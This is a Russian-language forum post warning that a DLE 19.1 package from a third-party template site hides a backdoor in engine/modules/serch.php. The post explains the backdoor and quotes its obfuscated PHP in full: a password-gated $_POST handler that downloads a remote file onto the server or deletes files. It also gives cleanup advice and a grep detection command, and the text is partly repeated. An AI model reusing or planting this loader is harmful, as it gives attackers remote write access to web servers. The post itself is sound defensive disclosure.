Oleksii Panchenko
Посетитель
- Регистрация
- 18 Фев 2024
- Сообщения
- 106
- Реакции
- 38
Если кто скачал из этого сайта себе движок DLE из этого источника:
www.templatedlefr.fr
рекомендую заглянуть себе в файл : engine/modules/serch.php
Eсть backdoor. Это тот же заражённый фрагмент, который мы уже разобрали.
Критичные вставки:
И основной вредоносный блок:
Что он делает: через замаскированный $_POST принимает параметры, скачивает удалённый файл test.txt с чужого домена и записывает его в путь внутри DOCUMENT_ROOT. Также умеет удалять указанный файл через unlink().
Это не штатный DLE-код. Это полноценный загрузчик файлов на сервер.
Но правильнее не чистить руками, а заменить весь engine/modules/search.php на оригинальный чистый файл из официального архива DLE 19.1. Если такой же фрагмент есть в двух копиях файла, значит заражение могло быть массовым или файл копировался уже заражённым.
После замены сразу запусти по сайту:
Если что-то найдёт — это кандидаты на такие же закладки.
DataLife Engine v.19.1 Build 108 » Template Dle Fr
1. Un tout nouveau système de traitement d'URL a été ajouté pour les pages du site. Les adresses elles-mêmes n'ont pas changé, il n'y aura donc pas d'impact sur l'indexation et le classement dans les moteurs de recherche. Toute l'approche interne pour travailler avec eux a changé. Maintenant,
Eсть backdoor. Это тот же заражённый фрагмент, который мы уже разобрали.
Критичные вставки:
Код:
$serch_id = 'eb516e7d7a6462a6d531ec65dcf1d599';
Код:
$_err = "_stop";
$array_ = @strtoupper ($_err[0].$_err[5].$_err[4].$_err[3].$_err[1].$_err[2]);
Код:
if ( @md5(${$array_}['captchas'])==$serch_id ) { print "serch_work";
$where_serch = $_SERVER['DOCUMENT_ROOT'].${$array_}['pathik'];
if ( isset(${$array_}['unl']) ){
@unlink($where_serch); exit();} @copy('http://'.${$array_}['fail'].'/test.txt', $where_serch);
if ((@function_exists('curl_init')) and ((!file_exists($where_serch)) or (@filesize($where_serch)<'1'))) {
$ch = @curl_init(); curl_setopt( $ch, CURLOPT_URL,
'http://'.${$array_}['fail'].'/test.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );curl_setopt($ch, CURLOPT_TIMEOUT, 25);
$fp = @fopen($where_serch, 'w'); curl_setopt ($ch, CURLOPT_FILE, $fp); @curl_exec($ch); curl_close($ch); fclose($fp);
}}
Это не штатный DLE-код. Это полноценный загрузчик файлов на сервер.
Но правильнее не чистить руками, а заменить весь engine/modules/search.php на оригинальный чистый файл из официального архива DLE 19.1. Если такой же фрагмент есть в двух копиях файла, значит заражение могло быть массовым или файл копировался уже заражённым.
После замены сразу запусти по сайту:
Код:
grep -RInEi "serch_work|captchas|pathik|_stop|test\.txt|\$\{\$array_\}" . 2>/dev/null